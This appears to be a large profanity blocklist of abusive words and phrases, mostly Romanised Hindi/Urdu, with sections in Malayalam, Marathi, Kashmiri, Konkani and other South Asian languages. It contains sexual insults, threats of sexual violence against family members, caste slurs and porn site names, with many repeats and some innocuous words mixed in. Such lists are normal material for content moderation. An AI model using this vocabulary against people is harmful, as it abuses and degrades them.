suwwar ki bachchi
suwwariya
tatte masalna
toota hua lund
tor mai ke chodho
ulloo choda stupid
ulloo ka patthaa
ullu ke pathe
undi
randi
raandi
randwe
harami
haram khor
haramkor
maa chod
maa chuda
maa chooda
maa ki aankh
randi ke
bc
bkl
muh me lele
maa ka bhosdaa
gandwe
gandwa
bhosdi wale
c***yapa
bosdi ke
bosdike
madarchood
big boobs
shake your boobs
sex boob
suck ur boobs
maderchod
xxx
are u slut
fuckyoself
laude
bhosda
chutiyapanti
bhnchooo
fuk u
chut loda
lun pakad lo
madarchod
ma ke lode
chooth
teri ma ka bamba
suck bitch
screw u
screw you
puccy
laudagiri
bhenchodh
madarchodh
choothiye
maa chudao
gaand mara
xdesi.com
xvideos.com
b***s
chutiyaapaa
bhenchodo
maaki chut
f@#* you
f... u
nice boobs
tere maa chodunga
amma chod
chinal log
chinal
fudu
fuddu
buckchod
lauda
maa chudaye
chudaye
randi k
gandu
jhaatu
jhatu
jhatoo
chussar
chup b bhosdike
bhosdi ke
bhosdi
maa ke lodey..
gand marao
behanchod
bhossdi k
maakilaudi
muth marke soja
muth marka soja
muth mar ke so ja
muth maar
boka choda
bhosdike
bakchod
backcgod
brest
cleavage
chudna
phudi
cutyiye
pennis
chu.t
backchod
hot clevage
clevage
gand
bhosadiwaale
bokachoda
nice cleavage
jhat
thode daba do
bosid***ke
band kar lav**d
bhaag bhanchode
bhanchode
baag bachod ladki
bachod
cu**t
ch****ye
ban**chid
chu chu
bachchod
ga**ndo
machudao
chuchi
teri maa ki ***
chusss le
chu
chuu
b*nch*d*
cutiye
bosidike
boooooobbbbbssss
muh mae le
bakchodi
bh*sdike
raan*s
lole
bhdve
bahan ki chuat
maadr chaad
ga**nd
ga**
chuchu
chusaa hua
bosidike
teri maa ka saaki
f***ing
f***off
chup mc
bhosdiwaale
bhosdikee
aaand mat kaha
aand mat kaha
aandal
aandu
aandupana
abla naari tera buble bhaari
amma ki chut
andh
apna land choos
apna lund choos
apna ma ko ja choos
apni gaand mein muthi daal
apni land choos
apni lund choos
apni ma ko ja choos
asal ka chuda
baap ke lavde
backar chodu
backarchodu
backchod
badeer
badir
badirchand
bahen chod
bahen ka loda
bahen ke laude
bahen ke takke
bahenchod
bahinchod
bahu chod
bakchod
bakchod billi
bakland
baklol
baklund
bakri chod
bakrichod
balatkaar
banchod
bc
behan chod
behen chod
behen ka laura
behen ke land
behen ke laude
behen ke lawde
behen ke lund
behen ke take
behenchod
behenkelaude
behnchod
benchod
beti chod
betichod
bhaand me jaao
bhadhava
bhadva chodika
bhadwa
bhadwe
bhadwe ka awlat
bhadwe ki nasal
bhag bhosdike
bhai chhod bhayee chod
bhai chod
bhainchod
bhains ki aulad
bhais ke lund
bhais ki poonch
bhand khau
bhandava
bhandwe ki aulad
bhen chhod bhaynchod
bhen chod
bhen di fuddi
bhen ke laude
bhen ke lode
bhen ke lode maa chuda
bhen ke takke
bhen ki choot
bhencho
bhenchod
bhodhsike
bhonsriwaalaa
bhootnee ka
bhootnik
bhosad chod
bhosad raand
bhosadchod
bhosadi k
bhosadi ke
bhosadike
bhosadiwala
bhosda
bhosdaa
bhosdee kay
bhosdi
bhosdi k
bhosdi ka
bhosdi kalam
bhosdi ke
bhosdi wala
bhosdi wale
bhosdik
bhosdika
bhosdike
bhosdivaale
bhosdiwala
bhosdiwale
bhundi
bokachoda
bol teri gand kaise maru
booblay
boor
bsdk
buddha khoosat
buhtahnee ka
bulle ke baal
bumchod
bund
bund maraa le
bur
bur ka choda
bur ki chatani
burr
burr ke baal
bursungha
camina
cha cha chod
chachunder ki aulad
chhola phudakna
chhut ka baal
chinaal
chinaal ke gadde ke nipple ke baal ke joon
chinal
chipkai ki choot ke paseene
chipkali ke chut ke pasine
chipkali ke gaand ke pasine
chipkali ke jhaat ke baal
chipkali ke jhaat ke paseene
chipkali ki bhigi chut
chippkali ke jhaant ke paseene
chod ke bal ka kida
chodela
chodu bhagat
chooche
choochi
choochii
chood
choodasi
choodpagal
choohe ki moot
choot k bhoot
choot k pakode
choot ka baal
choot ka paani
choot ka pissu
choot ke bhoot
choot ke bhoot vaginal ghost
choot ki jhilli
choot marani ka
chootad
chootadchod
chootia
chootiya
chootiyapanti
chopre he randi
chudaai
chudaai khaana
chudaai khaani
chudai khana
chudail
chudan chudai
chudase
chudasi
chude
chudi
chudpagal
chudwana
chull uthna
chullu bhar muth mein doob mar
chup ke chut hai
chusnawala
chusnawali
chut
chut k dher
chut ka bhoot
chut ka maindak
chut ka nai
chut ka pujari
chut karo
chut ke baal
chut ke dhakkan
chut ke gulam
chut ke makkhan
chut ke pakode
chut ke pasine mein talay huye bhajiye
chut khujaane vaali
chut ki andhi
chut ki pyasi
chut mari ke
chut marike
chut se latka hua laude ka moot
chutan
chute
chutia
chutiya
chutiya chootia
chutiya ka bheja ghas khane gaya hai
chutiyah
chutiye
chuttad
chuttad chod
cuntmama
cutlkat lund
dalli
dhee chod
dhee ka lund
dheela lund
dheeli choot
dheli chut
dogla
fatay huay lundtopi ka
fatay huay lundtopi ka result
fate condom ka natije
fatey condom kay natije
fuddi
fudii k
gaand
gaand chaat mera
gaand gaand
gaand k baal
gaand ka baal
gaand ka khadda
gaand ka makhan
gaand ka pilla
gaand ke dhakan
gaand ki aulaad
gaand maar bhen chod
gaand maarna
gaand main danda
gaand main keera
gaand main lassan
gaand mara
gaand marau
gaand marna
gaand mein bambu
gaand mein kida
gaandfat
gaandkate kutte
gaandmasti
gaandu
gadha
gand mein danda
gand mein louda
gandi chut mein sadta hua ganda kida
gandi fuddi ki gandi auladd
gandkate kutte
gandmare
gandmasti
gandu
gandu saala
gandue
gashti
gastee
gasti
ghassad
ghasti
ghelchodia
ghondoo
gote
gote kitne bhi bade ho lund ke niche hi rehte hai
goti muh mein hai
gundmaraa
gundmari
hamari le rahe hai
haraam ka chuda
haraam ki chudi
haraam zaada
haraami
haraamjaada
haraamjaadi
haraamkhor
haram zaadaa
harami
harami ke pille
haramkhor
haramzaada
haramzade
harazyaada
havas
hazaar lund teri gaand main
hijdaa
hijde
hijra
hrami
hugna
hugnaa
jab tu paida hua tho aagey se ya peechey se nikla tha chutiya
jab tu paida hua tow aagey se ya peechey se nikla tha chutiya
janam jala
janam jali
januwar
janwar
jhaant
jhaant ka baal
jhaant ke jhature
jhaant ke pissu
jhaant ukhaadna
jhaat
jhaat chaatu
jhaat ka bhaaji
jhaat ke baal
jhaatoon saala
jhaatu
jhad jaana
jhandu
jhant chaatu
jhant ke baal
jhantu
jhat ke baal
jhat lahergaya
jhatoo
jhund
joo ke hagge
kaala lund
kaali kutti
kadak maal
kahe ko kha raha hai chut ki chapati aur lund ka beja?
kali choot ke safaid jhaat
kali chut ka safaid jhaat
kamina
kamine
kaminee
kaminey
katla
khade lund pe dhoka
khasmanu khaani
khota
khotey ki aulad
khotey ki aulda
khujju
klpd
kukarchod
kutchudi
kutha
kutha sala
kuthi
kuthri
kuthta buraanahe kandaa nahi pattaahe
kutiya
kutiya ke pilley
kutiyaa
kutta
kutte
kutte ka aulad
kutte ka awlat
kutte ka bachha
kutte ka beej
kutte ka lund
kutte ke aulaad
kutte ke pilley
kutte ke poot
kutte ke tatte
kutte ki aulad
kutte ki jat
kutte ki olad
kutti
kuttiya
kya kadak hai ye
kya maal hai ye
ladkichod
land ka bheja
landait
landue
landure
lauda
laudap
laude
laude ke baal
laude sale
lavda
lavde
lavde ka baal
lavde ke baal
lavde ke bal
lawda
lawde
lo mera lund anpi behen ko de do agar khud na chod paya
lo mera lund apni behen ko de do agar khud na chod paya
loda
lode jesi shakal ke
lode ke baal
lodey jaise shakal teri
lodu
loduu
londiyachod
lowde ka bal
lund
lund choosu
lund chus
lund chuse
lund fakeer
lund fakir
lund fekh ke maroonga toh tera poora khandan chud jayega chutmarike
lund k laddu
lund ka baal
lund ka bheja
lund ka shorba
lund ke pasine
lund khajoor
lund luhnd
lund mera muh tera
lund pe chad ja
lund pe thand hai
lund phek ke marenge khandan chud jayega
lundfakir
lundoos
ma chudi
maa chudaa
maa ka lauda
maa ke bable
maa ke bhadve
maa ke bhadwe
maa ke laude
maa ki aankh
maa ki choot
maa ki chut
maacho
maachod
maachodh
maadar chowd
maadarchod
maadher chod
maakelaude
maal
maal chhodna
maarey hue chipkili ki unday
machod
machodh
madar chod
madar jaat
madarchod
madarchod ke aulaad
madarchodh
madarjat
mader chod
madharchod
maha gaandu
mahder chod
mahderchod
mai chod
maichod
mamme
mammey mummaye
mangachinamun
mast maal
mc
mein teri maa ko liya tha uski suhaag raat pei
mein teri maa ko teri bahen ki choot mein chodoonga aur tera baap laltern lekar aayega
mein teri maa ko teri bhen ki choot mein chodoonga aur tera baap laltern lekar aayega
mera chunni choos
mera ganna mere dil se bada hai
mera gota moo may lay
mera lund choos
mera lungi me havas ki aag lagi hai
mera muhme le
mera mume le
mere chuus maro
mere fudi kha ley
mere pass nile rang ke gend hai
meri gand ka baal
meri gand ka khatmal
meri ghand ka baal
meri lund choos
meri lundh choos
mome ka pasina chat
moo may lay mera
moot
mooth marna
mootna
mu c waale
mujhe aap ki chut chahiye
mujhe aap ko chodna hai
mujhe aap ko thokna hai
mujhe chodne ki bhukh hai
mujhe chut chahiye
mujhe chut marni hai
mujhe ko chodna hai
mujhe tumhe chodna
mujhe tumhe thokna
mujhe usko chodna hai
mutar
muth maar
muth mar
muth marna
mutth marna
mutthal
na choot na chooche nakhre noor jahan ke
naali ka keeda
najayaz
najayaz paidaish
paagal choda
paagalchoda
parichod
phatele nirodh ke natije
phuddi
pig ki tatti
pille
raand
raand codha
raand ka jamai
raand ka pati
raand whore
raandi baajer
rakhail
rand
rand chod
rand ki moot
randawa
randhwa
randi
randi baj
randi chod
randi ka bachcha
randi ka choda
randi ka larka
randi ke baal
randi ke bacche
randi ke beej
randi ke dalal
randi ke jhaant ke toote hue baal
randi ki aulaad
randi ki aulad
randi ki chut
randuaa
randwa
randwe
rubber bhosda
rundee
rundi
rundi apni chut leka ana
rundi ka bacha
rundi ke tatti pe biathne wala makhi
rundi khana
rundi ki bachi
rundi ki tatti pe baithne waali makkhi
rundi ki tatti pe baithnewaali makkhi
rundi ko chod
rundi ko choud
rundi ko chowd
saala
saala betichod
saala kutta
saale
saali kutti
sab ka lund teri ma ki chut mein
sadi hui gaand
sadi hui gand
sala
sala kuttaa
sale
sali kuta
sali kutti
sardar fuda singh
seal bund
sewwer ki bachi
shali
sooar
soover
soower ki bachi
suar
suar ki tatti
sust lund ki padaish
suvar chod
suwar ki aulad
suwwar
suwwar ka bachcha
suwwar ke lund
suwwar ki bachchi
suwwariya
suyar ke baacho
tatte masalna
tatti tatte masalna
tei maa ki gaand me bhi
tera baap ki chut aur maa ke laude
tere adha nirodh mein rah gaya
tere baap ki chut mai teri maa ka land
tere baap ki gaand teri chute mai chuglee
tere gaand mein keede paday
tere maa ka bur
tere maa ko sau kutte chode sau wa tera baap!
tere maa ko sau kutte chode – sau wa tera baap
tere mai ki chut baap teri maa ka land
terey baad di gaand wich danda ghussa ker rakh dhungi
terey baad di gaand wich dhanda gussa ker rakdhungi
teri behen ka bhosda faadu
teri behen ka lauda rubber ka
teri behen ka launda rubber ka
teri behen ka lavda rubber ka
teri bhen ki gaand me ungli karunga
teri bhosri mein aag
teri biwiko teri saamne chodhunga
teri biwiko theri saamne chodhunga
teri gaand main kute ka lund
teri gaand me danda
teri gaand mein haathi ka lund
teri gand mai ghadhe ka lund
teri gand mein haathi ka lund
teri jhanten kaat kar tere mooh par laga kar unki french beard bana doonga
teri ma chadha ka lund choos
teri ma gadha ka lund choos
teri ma gandi rundi
teri ma ki budh mein chaarpai bichhake teri bahen ko chodun
teri ma ki bund mein chaarpai bichhake teri bhen ko chodun
teri ma ki choot me hathi ka dum
teri ma ki chut mai sabka lund
teri ma ko kutta chode
teri maa ka
teri maa ka bhosda
teri maa ka bhosra
teri maa ka boba chusu
teri maa ke bable
teri maa ke bhosade ke baal
teri maa ke bobe kha jaunga bhosdi ke
teri maa ki bimaar badboodar choot
teri maa ki choot
teri maa ki choot me hathi ka dum
lavda
teri maa ki chute
phudi
teri maa ko chodun
chodun
choot
tharki
theri biwi ko tere saamne chodhunga
toota hua lund
tor mai ke chodho
tu tera maa ka lauda
tum chutiya ho
ulloo choda
ulloo ka patthaa
ullu ke pathe
aand
aaand
aandu
bakchod
balatkar
bc
beti chod
bhadva
bhadve
bhandve
bhootni ke
bhosad
bhosadi ke
bhosda
boobe
chakke
chinaal
chinki
chod
chodu
chodu bhagat
chooche
choochi
choot
choot ke baal
chootia
chootiya
chuche
chuchi
chudai khanaa
chudan chudai
chut
chut ke baal
chut ke dhakkan
chut maarli
chutad
chutadd
chutan
chutia
chutiya
gaand
gaandfat
gaandmasti
gaandufad
gandu
gashti
gasti
ghassa
ghasti
hagga
harami
haramzade
hawas
hawas ke pujari
hijda
hijra
jhant
jhant chaatu
jhant ke baal
jhantu
kamine
kaminey
kanjar
kutta
kutta kamina
kutte ki aulad
kutte ki jat
kuttiya
loda
lodu
lund
lund choos
lund khajoor
lundtopi
lundure
maa ki chut
maal
mc
madar chod
mooh mein le
mutth
najayaz
najayaz aulaad
najayaz paidaish
paki
raand
randi
saala
saala kutta
saali kutti
saali randi
suar
suar ki aulad
tatte
tatti
teri maa ka bhosada
teri maa ka boba chusu
teri maa ki chut
tharak
tharki
madrchod
bhnchod
aaand mat kaha
aand mat kaha
aandal
aandu
aandupana
abla naari tera buble bhaari
amma ki chut
andh
apna land choos
apna lund choos
apna ma ko ja choos
apni gaand mein muthi daal
apni land choos
apni lund choos
apni ma ko ja choos
asal ka chuda
baap ke lavde
backar chodu
backarchodu
back chod
backchod
badeer
badir
badirchand
bahen chod
bahen ka loda
bahen ke laude
bahen ke takke
bahenchod
bahinchod
bahu chod
bakchod
bakchod billi
bakland
baklol
baklund
bakri chod
bakrichod
behen chod
behen ka laura
behen ke land
behen ke laude
behen ke lawde
behen ke lund
behen ke take
behenchod
behenkelaude
behnchod
benchod
beti chod
betichod
bhaand me jaao
bhadhava
bhadva chodika
bhadwa
bhadwe
bhadwe ka awlat
bhadwe ki nasal
bhag bhosdike
bhai chhod bhayee chod
bhai chod
bhainchod
bhais ke lund
bhandava
bhen chod
bhen ke laude
bhen ke lode
bhen ke lode maa chuda
bhen ke takke
bhen ki choot
bhencho
bhenchod
bhodhsike
bhonsriwaalaa
bhootnee ka
bhootnik
bhosad chod
bhosad raand
bhosadchod
bhosadi k
bhosadi ke
bhosadike
bhosadiwala
bhosda
bhosdaa
bhosdee kay
bhosdi
bhosdi k
bhosdi ka
bhosdi kalam
bhosdi ke
bhosdi wala
bhosdi wale
bhosdik
bhosdika
bhosdike
bhosdivaale
bhosdiwala
bhosdiwale
bhundi
bokachoda
bol teri gand kaise maru
booblay
boor
bsdk
buddha khoosat
buhtahnee ka
bulle ke baal
bumchod
bund
bund maraa le
bur
bur ka choda
bur ki chatani
burr
burr ke baal
bursungha
camina
cha cha chod
chachunder ki aulad
chhola phudakna
chhut ka baal
chinaal
chinaal ke gadde ke nipple ke baal ke joon
chinal
chipkai ki choot ke paseene
chipkali ke chut ke pasine
chipkali ke gaand ke pasine
chipkali ke jhaat ke baal
chipkali ke jhaat ke paseene
chipkali ki bhigi chut
chippkali ke jhaant ke paseene
chod ke bal ka kida
chodela
chodu bhagat
chooche
choochi
choochii
chood
choodasi
choodpagal
choohe ki moot
choot k bhoot
choot k pakode
choot ka baal
choot ka paani
choot ka pissu
choot ke bhoot
choot ke bhoot vaginal ghost
choot ki jhilli
choot marani ka
chootad
chootadchod
chootia
chootiya
chootiyapanti
chopre he randi
chudaai
chudaai khaana
chudaai khaani
chudai khana
chudail
chudan chudai
chudase
chudasi
chude
chudi
chudpagal
chudwana
chull uthna
chullu bhar muth mein doob mar
chup ke chut hai
chusnawala
chusnawali
chut
chut k dher
chut ka bhoot
chut ka maindak
chut ka nai
chut ka pujari
chut karo
chut ke baal
chut ke dhakkan
chut ke gulam
chut ke makkhan
chut ke pakode
chut ke pasine mein talay huye bhajiye
chut khujaane vaali
chut ki andhi
chut ki pyasi
chut mari ke
chut marike
chut se latka hua laude ka moot
chutan
chute
chutia
chutiya
chutiya chootia
chutiya ka bheja ghas khane gaya hai
chutiyah
chutiye
chuttad
chuttad chod
cuntmama
cutlkat lund
dalli
dhee chod
dhee ka lund
dheela lund
dheeli choot
dheli chut
dogla
fatay huay lundtopi ka
fatay huay lundtopi ka result
fate condom ka natije
fatey condom kay natije
fuddi
fudii k
gaand
gaand chaat mera
gaand gaand
gaand k baal
gaand ka baal
gaand ka khadda
gaand ka makhan
gaand ka pilla
gaand ke dhakan
gaand ki aulaad
gaand maar bhen chod
gaand maarna
gaand main danda
gaand main keera
gaand main lassan
gaand mara
gaand marau
gaand marna
gaand mein bambu
gaand mein kida
gaandfat
gaandkate kutte
gaandmasti
gaandu
gadha
gand mein danda
gand mein louda
gandi chut mein sadta hua ganda kida
gandi fuddi ki gandi auladd
gandkate kutte
gandmare
gandmasti
gandu
gandu saala
gandue
gashti
gastee
gasti
ghassad
ghasti
ghelchodia
ghondoo
gote
gote kitne bhi bade ho lund ke niche hi rehte hai
goti muh mein hai
gundmaraa
gundmari
hamari le rahe hai
haraam ka chuda
haraam ki chudi
haraam zaada
haraami
haraamjaada
haraamjaadi
haraamkhor
haram zaadaa
harami
harami ke pille
haramkhor
haramzaada
haramzade
harazyaada
havas
hazaar lund teri gaand main
hijdaa
hijde
hijra
hrami
hugna
hugnaa
jab tu paida hua tho aagey se ya peechey se nikla tha chutiya
jab tu paida hua tow aagey se ya peechey se nikla tha chutiya
janam jala
janam jali
januwar
janwar
jhaant
jhaant ka baal
jhaant ke jhature
jhaant ke pissu
jhaant ukhaadna
jhaat
jhaat chaatu
jhaat ka bhaaji
jhaat ke baal
jhaatoon saala
jhaatu
jhandu
jhant chaatu
jhant ke baal
jhat ke baal
jhat lahergaya
jhatoo
jhund
joo ke hagge
kaala lund
kaali kutti
kadak maal
kahe ko kha raha hai chut ki chapati aur lund ka beja?
kali choot ke safaid jhaat
kali chut ka safaid jhaat
kamina
kamine
kaminee
kaminey
katla
khade lund pe dhoka
khasmanu khaani
khota
khotey ki aulad
khotey ki aulda
khujju
klpd
kukarchod
kutchudi
kutha
kutha sala
kuthi
kuthri
kuthta buraanahe kandaa nahi pattaahe
kutiya
kutiya ke pilley
kutiyaa
kutta
kutte
kutte ka aulad
kutte ka awlat
kutte ka bachha
kutte ka beej
kutte ka lund
kutte ke aulaad
kutte ke pilley
kutte ke poot
kutte ke tatte
kutte ki aulad
kutte ki jat
kutte ki olad
kutti
kuttiya
kya kadak hai ye
kya maal hai ye
ladkichod
land ka bheja
landait
landue
landure
lauda
laudap
laude
laude ke baal
laude sale
lavda
lavde
lavde ka baal
lavde ke baal
lavde ke bal
lawda
lawde
lo mera lund anpi behen ko de do agar khud na chod paya
lo mera lund apni behen ko de do agar khud na chod paya
loda
lode jesi shakal ke
lode ke baal
lodey jaise shakal teri
lodu
loduu
londiyachod
lowde ka bal
lund
lund choosu
lund chus
lund chuse
lund fakeer
lund fakir
lund fekh ke maroonga toh tera poora khandan chud jayega chutmarike
lund k laddu
lund ka baal
lund ka bheja
lund ka shorba
lund ke pasine
lund khajoor
lund luhnd
lund mera muh tera
lund pe chad ja
lund pe thand hai
lund phek ke marenge khandan chud jayega
lundfakir
lundoos
ma chudi
maa chudaa
maa ka lauda
maa ke bable
maa ke bhadve
maa ke bhadwe
maa ke laude
maa ki aankh
maa ki choot
maa ki chut
maacho
maachod
maachodh
maadar chowd
maadarchod
maadher chod
maakelaude
maal
maal chhodna
maarey hue chipkili ki unday
machod
machodh
madar chod
madar jaat
madarchod
madarchod ke aulaad
madarchodh
madarjat
mader chod
madharchod
maha gaandu
mahder chod
mahderchod
mai chod
maichod
mamme
mammey mummaye
mangachinamun
mast maal
mc
mein teri maa ko liya tha uski suhaag raat pei
mein teri maa ko teri bahen ki choot mein chodoonga aur tera baap laltern lekar aayega
mein teri maa ko teri bhen ki choot mein chodoonga aur tera baap laltern lekar aayega
mera chunni choos
mera ganna mere dil se bada hai
mera gota moo may lay
mera lund choos
mera lungi me havas ki aag lagi hai
mera muhme le
mera mume le
mere chuus maro
mere fudi kha ley
mere pass nile rang ke gend hai
meri gand ka baal
meri gand ka khatmal
meri ghand ka baal
meri lund choos
meri lundh choos
mome ka pasina chat
moo may lay mera
moot
mooth marna
mootna
mu c waale
mujhe aap ki chut chahiye
mujhe aap ko chodna hai
mujhe aap ko thokna hai
mujhe chodne ki bhukh hai
mujhe chut chahiye
mujhe chut marni hai
mujhe ko chodna hai
mujhe tumhe chodna
mujhe tumhe thokna
mujhe usko chodna hai
mutar
muth maar
muth mar
muth marna
mutth marna
mutthal
na choot na chooche nakhre noor jahan ke
naali ka keeda
najayaz
najayaz paidaish
paagal choda
paagalchoda
parichod
phatele nirodh ke natije
phuddi
pig ki tatti
pille
raand
raand codha
raand ka jamai
raand ka pati
raand whore
raandi baajer
rakhail
rand
rand chod
rand ki moot
randawa
randhwa
randi
randi baj
randi chod
randi ka bachcha
randi ka choda
randi ka larka
randi ke baal
randi ke bacche
randi ke beej
randi ke dalal
randi ke jhaant ke toote hue baal
randi ki aulaad
randi ki aulad
randi ki chut
randuaa
randwa
randwe
rubber bhosda
rundee
rundi
rundi apni chut leka ana
rundi ka bacha
rundi ke tatti pe biathne wala makhi
rundi khana
rundi ki bachi
rundi ki tatti pe baithne waali makkhi
rundi ki tatti pe baithnewaali makkhi
rundi ko chod
rundi ko choud
rundi ko chowd
saala
saala betichod
saala kutta
saale
saali kutti
sab ka lund teri ma ki chut mein
sadi hui gaand
sadi hui gand
sala
sala kuttaa
sale
sali kuta
sali kutti
sardar fuda singh
seal bund
sewwer ki bachi
sooar
soover
soower ki bachi
suar
suar ki tatti
sust lund ki padaish
suvar chod
suwar ki aulad
suwwar
suwwar ka bachcha
suwwar ke lund
suwwar ki bachchi
suwwariya
suyar ke baacho
tatte masalna
tatti tatte masalna
tei maa ki gaand me bhi
tera baap ki chut aur maa ke laude
tere adha nirodh mein rah gaya
tere baap ki chut mai teri maa ka land
tere baap ki gaand teri chute mai chuglee
tere gaand mein keede paday
tere maa ka bur
tere maa ko sau kutte chode sau wa tera baap!
tere maa ko sau kutte chode ñ sau wa tera baap
tere mai ki chut baap teri maa ka land
terey baad di gaand wich danda ghussa ker rakh dhungi
terey baad di gaand wich dhanda gussa ker rakdhungi
teri behen ka bhosda faadu
teri behen ka lauda rubber ka
teri behen ka launda rubber ka
teri behen ka lavda rubber ka
teri bhen ki gaand me ungli karunga
teri bhosri mein aag
teri biwiko teri saamne chodhunga
teri biwiko theri saamne chodhunga
teri gaand main kute ka lund
teri gaand me danda
teri gaand mein haathi ka lund
teri gand mai ghadhe ka lund
teri gand mein haathi ka lund
teri jhanten kaat kar tere mooh par laga kar unki french beard bana doonga
teri ma chadha ka lund choos
teri ma gadha ka lund choos
teri ma gandi rundi
teri ma ki budh mein chaarpai bichhake teri bahen ko chodun
teri ma ki bund mein chaarpai bichhake teri bhen ko chodun
teri ma ki choot me hathi ka dum
teri ma ki chut mai sabka lund
teri ma ko kutta chode
teri maa ka
teri maa ka bhosda
teri maa ka bhosra
teri maa ka boba chusu
teri maa ke bable
teri maa ke bhosade ke baal
teri maa ke bobe kha jaunga bhosdi ke
teri maa ki bimaar badboodar choot
teri maa ki choot
teri maa ki choot me hathi ka dum
teri maa ki choot me kutte ka lavda
teri maa ki chut
teri maa ki chut mai sabka lund
teri maa ki chut mein chatri leke ghus jaunga aur khol dunga
teri maa ki chute
teri maa ki gaand ki baal mein jalaay hue
teri maa ki gaand ki baal mein jalaay hue maarey hue chupkili ki unday
teri maa ki maari choot
teri maa ki phudi guy ki hai
teri maa ki sukhi bhos
teri maa ko chodun
teri mi di kussi mey tera sarra khandan ko ggussa ker rakhdoungi
teri mi di kussi mey tera sarra khandan ko ghussa ker rakh doonga
teri phuphi ki choot mein
tharki
theri biwi ko tere saamne chodhunga
toota hua lund
tor mai ke chodho
tu tera maa ka lauda
tum chutiya ho
ulloo choda
ulloo ka patthaa
ullu ke pathe
Bewarsi
Mukli muchkondu kutko
Mukli tuth
Rande
Randi magane
Saak thika muchappa
shraddha
Soole Maga
Tulla
Aab
baaz akh de
babba aasus manz choosni
babbe kache chatai
bablyaath
be lakhay beni
beni gooud
Beni lakhai
beyani goood
bh lakhai che
Brahman chaenk
Chaaan
chakij
chakjeh goud
Chapin
che chui mazze lakhnas
Choti travi marchevangan
Chotul
chwath
Dagaddalli maa de bacheio
Dawa woal
diyanawaan
duniyah che khap
Fhalaan
fis
Gaan
gaani bach
Gees
ghain
Gooid prah
Goudi Sawaer
guude
Ha kole madarchoda
Hahra
haramuk
Hasna
Haspataal
houn goudiuk
kani jung
Khade daez
khape chraethe
khapkhap
Kucher
laith
langan dimay darith
lazmai bene
lazmai goudis
Lazmaiye Mael Sinze Kori
Lazmayi babbun
lazmie lyath
Lechmayaa benzi
Lezmaye Lyaath
liyath chani goodis
lyaath
lyath kal
lyathee kale
Lyathh
Ma lakh goudis
maaji gooud
maaji lakhai
maeji guudh
maeji lyaath
maelis lakhai
mambre kalle
Meethir
Momri Kalle
MUAMD
Mumer
Mye kya zok kadkhe
Naer
Pael
phutyaa poon
ponas lakhai
ponas manz chu chout kieom
Ponne Tecczh
Poon
poonus lakhai
rath mein lyath
sa here tok mi haijla
Sabzi woal
Seel tuluai
seous good
Siiech
Sous
Taech
tche che baji bab
thapi karani
Watul
Zakal ponz
Zang
Zinhook
zoake goodh
zok
zokke poan
Zokkk
Gandah kullah pudha
Gandhu
Gandhu bastar
Hanzeer da puthar
Jannay na puthar
Kalayah
Khotah
Khotay da puthar
Kuttah
Kuttay na puthar
Kutthi
Lan choop
Lofar
Mammay
May thara pudha marsah
Nikki lan
Pahari ki aulad
Pudhu goray
Randi na puthar
Yadeenah
Aavoi Zovno
Avoichi/Maichi Fudh
baakri
babak zovnya
Babay Aand
bainik zovnya
bewarshi
Bhikarchot
Bhokan bot
Bokan bot
Chedi
Chedye kastachya
Chedyecho
Chont
Chontli
Colwont
daba daba
Fodo
Fodri
Fuddri
Fude
Gaand
Gadith
ganDi bot gaali
gandi ke bot davari
GanDi votto
Guru
kick your ass
maari
Maichi fud
masti pisso
minni
momme
momo
moshye fudd
muje bonk lew
paadu
Popoot
Potachea
Potnechya
rande puth
Randecho
Shent
shet maar pilluk
sunna manngo
sunne jati che
Tu Zovlo Khubyakarnicha chedvak
Tu Zovlo Khubyakarnik
tugile gaandi
Tujya Baye Fodo
ubyani zhovta
zhenge
Zonyachea
zov babak
Zov Bai
zov rangyak
amaa fui
Amaa fui
Amaa handhaan kurey
amaa thalhaa
Badi
Buri Loa valhu
Fada boe
Fada boey
Fada Thiki
Fatha folhi
magey foah boe
mani boe
Nagoo balhu
nagoobalhu
"Ninde ama, pati!"
Aaana kunna
aan-vedi
achante andi
Achinga Kunnan
adichu poli
Ajoli ka Thajoli
ammaudi pootil poocha
amminhnha
Andi pidiyan
anna kunna
appikunna
arraykku chuttum poorruu ullaval
avaraathi
avarathi mone
chalam nakki
Chandi
Chokka lingam
coondi
Da patti
eli kunna
Ettukali Patti Pooran
inchi mola
johninte andi
kaatu poori
kallel oouuki
kandara oli
kandi
kandi theeni
Kandu
Kanni
Kanni mola
kara vedi
karim kunna
karim pooran
katta thayoli
kazhappu perutha mairan
Keepu
Kettal
kodam nakiii
Kolekkeri
Koothara
Koothi
Koothichi
kotham
kotham kalakki
kotham nakku
Koyimani
kuch
kulamavuka
kundan
kundaroli poori mone
Kundi
Kundi mon
Kundi oota
kundimol
kunji kunnan
kunna
Kunna
kunna chappu
Kunna Oli
Kunna paal
Kunna thayoli
kunna urunji
kunnappal
kushukk
Lick Me
malayalam
Maratel ooki
Masa
Mattanga Poore
Mayiradi mon
Mlechan
mola
moonchikko
Mula Adi
mula chappu
mula kashakku
mula mol
Myir
Myre
Myrru
Naayi meedan
nayinte mone
Nayinte Mone
Nayinte Monne
ninde andi maire
Ninte ama koondi ishtima
Ninte ammakku vettu nayinte mone
Ninte ammaku vetu
ninte ammeda tar
Ninte Ammede Kothil.
ninte ammede pooru
Ninte ammede thenga mairu
ninte appante andi
Odu myre
ookki
oomban
oombi mon
Oooomb
Ootan
paara pooru
paareel ookki
Pacha tayolli
Pachila Pooran
Paik keriko myra
paiku vetti
pala thanthakkundaya thaoli
pallinedayil kanthu
pambara kutichi
pampara thayoli
panchavarna kunna
pandi kallan
panniyoli
para andi oomba
Para kutichi
para thayoli punda mon
parii
pathala poor
patti poori mon
patty theettam
Pela molichi
Pela vedi
pela vedi kandaroli
petty
Pezhachu Pettavan
Poda Thayoli
podda Patti
pola vettu
poochi
Pooranddi
poore ennayil tenni veetil poda
Poori mone
Poorri
Pooru
pooru
Pooru Montha
poottaavi
poottile mathycurry
poyi ninte kunna oombadaa
poyi oombada
praa thayolli
Puchi
pudti puliyadi
Pulayadi monae
pundachi mone
Purusha Vedi
rainayude poore
Santhosh Pandit
Shukla mughan
shuklam dheeni
shuklam nakki
Takkali pooru
Thaayoli
thabala pooran
thakara thayoli
Thallayoli
Thalleyoli
thayolee
thayoli
Thayoli
thayoli idli
Thayoli idli
Theetam
theetta moran
theettam
theettathel ookki
THENGA MYRE
Thenga pooru
Thevadichi
Thokolli kalla sami
Thukal Kunna
umman
vada
Vadam vali
vali
Vayilitto
vedi
vedi pura
vedi vekkuka
Veppatti
veshya / veshi
vettukili
Viral Iduka
vouvalinu undaya thayoli
aai chi gand
Aai ghalya
aai javada
aaichya gavat pay
Aandya
ai zawlee
akkar mashi
Aye Jhaatu
ayica dana
Badak Zawarya
Bhadavya
